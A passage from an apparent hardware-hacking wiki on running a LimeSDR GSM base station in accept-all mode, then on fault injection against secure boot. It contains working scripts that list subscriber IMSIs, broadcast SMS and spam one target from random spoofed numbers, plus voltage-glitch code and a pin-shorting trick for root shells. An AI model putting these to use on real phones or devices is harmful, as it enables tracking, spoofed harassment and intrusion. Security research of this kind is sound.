!\n! OsmoBTS configuration example\n!!\n!\nlog stderr\n logging color 1\n logging timestamp 0\n logging level rsl notice\n logging level oml notice\n logging level rll notice\n logging level rr notice\n logging level loop debug\n logging level meas debug\n logging level pag error\n logging level l1c error\n logging level l1p error\n logging level dsp error\n logging level abis error\n\n!\nline vty\n no login\n!\nphy 0\n instance 0\n osmotrx rx-gain 40\n osmotrx tx-attenuation 50\n osmotrx ip local 127.0.0.1\n osmotrx ip remote 127.0.0.1\n no osmotrx timing-advance-loop\nbts 0\n oml remote-ip 127.0.0.1\n ipa unit-id 1801 0\n gsmtap-sapi pdtch\n gsmtap-sapi ccch\n band 900\n trx 0\n phy 0 instance 0\nThe only importante parameter here to take care is band. Make sure is the same as in openbsc.cfg file. The next one is osmo-trx.cfg which will be used by osmo-trx-lms:
log stderr\n logging filter all 1\n logging color 1\n logging print category 1\n logging timestamp 1\n logging print file basename\n logging level set-all info\n!\nline vty\n no login\n!\ntrx\n bind-ip 127.0.0.1\n remote-ip 127.0.0.1\n base-port 5700\n egprs disable\n tx-sps 4\n rx-sps 4\n rt-prio 18\n chan 0\n tx-path BAND1\n rx-path LNAW\nThere are not much to change here. If you\u2019re using a multi-port LimeSDR (like LimeSDR USB or PCIe) you can change the parameter tx-path and rx-path to the desired paths.
"},{"location":"radio-frequency/limesdr-bts/#running-the-software-stack","title":"Running the software stack","text":"There are a few programs to run to get the BTS working. You should run all of them from the folder you created the configuration files.
The first one we should run is osmo-trx-lms . This one should be ran as root to enable high priority scheduling (specially needed if you\u2019re running a small SBC like a Raspberry PI).
sudo osmo-trx-lms\nThe second one is the osmo-nitb which is the base station controller. This one doesn\u2019t need to be ran as root.
osmo-nitb\nAnd the last software is the osmo-bts-trx which handles the transceiver:
osmo-bts-trx\nNow your base station should be running.
"},{"location":"radio-frequency/limesdr-bts/#testing-the-base-station","title":"Testing the Base Station","text":"The best way to test is to have a custom simcard like this one:
But since we set the BTS to accept-all mode, you can just go to your phone network settings and select the created network. That will work fine if you have an Android phone which allows you to select custom networks:
Here is the network I just created with MCC 724 and MNC 70. In some simcards it is required that the MCC is the same as sim country (for example here it only shows if the network is at 724).
After connecting to the network, the name should appear instead of the MCC+MNC code:
"},{"location":"radio-frequency/limesdr-bts/#listing-subscribers","title":"Listing Subscribers","text":"There is a simple python script to list the subscribers. What it does is to open the sqlite database and do a simple query and print.
#!/usr/bin/env python\nimport sqlite3\n\nHLR_DATABASE = \"hlr.sqlite3\"\ndb = sqlite3.connect(HLR_DATABASE)\nc = db.cursor()\nc.execute(\"SELECT * FROM Subscriber\")\n\nprint \"ID\\t\\tcreated\\t\\tIMSI\\t\\t\\tTMSI\\t\\textension\\n\"\nwhile 1:\n subscriber = c.fetchone()\n if not subscriber:\n break\n\n print \"{0:1}\\t{1:2}\\t{2:<15}\\t\\t{3:<10}\\t{4}\".format(\n subscriber[0],\n subscriber[1],\n subscriber[3],\n subscriber[7],\n subscriber[5]\n )\n\ndb.close()\nThe IMSI field is unique to that phone / simcard combination. That\u2019s the number you can use to track a specific user around the world. The extension is the assigned phone number for that specific phone.
"},{"location":"radio-frequency/limesdr-bts/#sending-sms","title":"Sending SMS","text":"There are two scripts I found in the internet to send SMS. They basically selects the IMSI from the sqlite database the Osmo stack creates and then connects through the telnet interface to issue the desired commands. One of them is sms_broadcast.py:
#!/usr/bin/env python\nimport telnetlib\nimport sqlite3\nimport sys\n\nimsi = 999999999999999\nHLR_DATABASE = \"hlr.sqlite3\"\n\ndef check_extension(extension):\n conn.write(b\"show subscriber extension %s\\n\" % extension)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for extension\" in res:\n create_subscriber(extension)\n\ndef create_subscriber(extension):\n print(\"No user with excension %s found. Creating new...\" % extension)\n print(\"Extension: %s, IMSI: %d\" % (extension, imsi))\n\n conn.write(b\"show subscriber imsi %d\\n\" % imsi)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for imsi\" in res:\n conn.write(b\"subscriber create imsi %d\\n\" % imsi)\n conn.read_until(b\"OpenBSC> \")\n\n conn.write(b\"enable\\n\")\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"subscriber imsi %d extension %s\\n\" % (imsi, extension))\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"disable\\n\")\n conn.read_until(b\"OpenBSC> \")\n\ndef get_users():\n # returns user id list generator\n\n db = sqlite3.connect(HLR_DATABASE)\n c = db.cursor()\n c.execute(\"SELECT * FROM Subscriber\")\n\n for subscriber in c.fetchall():\n yield subscriber[0]\n\ndef send_sms(id, extension, message):\n conn.write(b\"subscriber id %d sms sender extension %s send %s\\n\" % (id, extension, message))\n res = conn.read_until(b\"OpenBSC> \")\n if b\"%\" in res:\n print(res)\n exit(1)\n\nif __name__ == \"__main__\":\n try:\n extension = sys.argv[1]\n message = \" \".join(sys.argv[2:])\n except:\n print(\"usage: ./sms_broadcast.py extension message\")\n print(\"This script sends a message from the specified extension (number) to all devices connected to this base station\")\n exit(1)\n\n conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n conn.read_until(b\"OpenBSC> \")\n\n check_extension(extension)\n\n for id in get_users():\n send_sms(id, extension, message)\nThis one is pretty simple to use:
python sms_broadcast.py \"source number\" \"message\"\nAnother option is to target a single user:
#!/usr/bin/env python\nimport telnetlib\nimport sys\nimport random\nimport time\n\nimsi = 999999999999999\n\ndef check_extension(extension):\n conn.write(b\"show subscriber extension %s\\n\" % extension)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for extension\" in res:\n print(\"Phone with extension %s not found ;(\" % extension)\n exit(1)\n\ndef check_spam_subscriber():\n conn.write(b\"show subscriber imsi %d\\n\" % imsi)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for imsi\" in res:\n conn.write(b\"subscriber create imsi %d\\n\" % imsi)\n print(conn.read_until(b\"OpenBSC> \"))\n\ndef send(extension, spam_number, message):\n print(\"Sending sms from %d...\" % spam_number)\n\n conn.write(b\"enable\\n\")\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"subscriber imsi %d extension %d\\n\" % (imsi, spam_number))\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"disable\\n\")\n conn.read_until(b\"OpenBSC> \")\n\n conn.write(b\"subscriber extension %s sms sender extension %d send %s\\n\" % (extension, spam_number, message))\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"%\" in res:\n print(res)\n exit(1)\n\nif __name__ == \"__main__\":\n try:\n extension = sys.argv[1]\n repeats = int(sys.argv[2])\n message = \" \".join(sys.argv[3:])\n except:\n print(\"usage: ./sms_spam.py extension [num of repeats] message\")\n print(\"This script sends a message to specified number\")\n exit(1)\n\n conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n conn.read_until(b\"OpenBSC> \")\n\n check_extension(extension)\n check_spam_subscriber()\n\n for _ in range(repeats):\n spam_number = random.randint(1000,9999)\n send(extension, spam_number, message)\n time.sleep(2)\nThis one generates a random source number and sends the specified message n times.
python sms_spam.py \"target number\" \"number of times\" \"message\"\nhttps://github.com/ainfosec/FISSURE
"},{"location":"secure-boot/","title":"Secure Boot","text":"Power glitch injection is a physical attack technique used to test and exploit vulnerabilities in electronic devices by causing controlled, temporary power disturbances. A VCC glitch, also known as a supply voltage glitch, is a specific type of power glitch attack targeting the voltage supply (VCC) of a microcontroller or integrated circuit (IC) in electronic devices.
Most of the time the goal is one of the following:
Tools
Voltage Glitching with Crowbars
import faultier\nimport serial\n\nft = faultier.Faultier()\nser = serial.Serial(ft.get_serial_path(), baudrate=115200)\nser.timeout = 0.3\n\nft.configure_glitcher(\n trigger_source = faultier.TRIGGER_IN_EXT0,\n trigger_type = faultier.TRIGGER_PULSE_POSITIVE\n glitch_output = faultier.OUT_CROWBAR\n)\nft.glitch(delay = 1000, pulse = 1)\nprint(ser.read(3))\nChallenges
gpio glitch trigger PB0 pin PC15 length 100 offsets 191200\ngpio glitch trigger PB0 pin PC15 length 100 offsets 191300\nElectromagnetic Fault Injection is an advanced technique used in hardware security and testing, where electromagnetic pulses are used to induce faults in electronic devices
Tools
Challenges
This technique involves momentarily disrupting or altering the clock signal of a device to induce errors or malfunctions in its operation.
Challenges
pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24
In the case of an external SPI flash, it is possible for an attacker to short these pins :
The MCU will not be able to get data from the external flash and then show a stacktrace, get a shell in the bootloader or worst a root shell on the embedded Linux.
Here is a practical example, putting a cable between MOSI and Chip Select :
"},{"location":"side-channel/fault-injection/#references","title":"References","text":"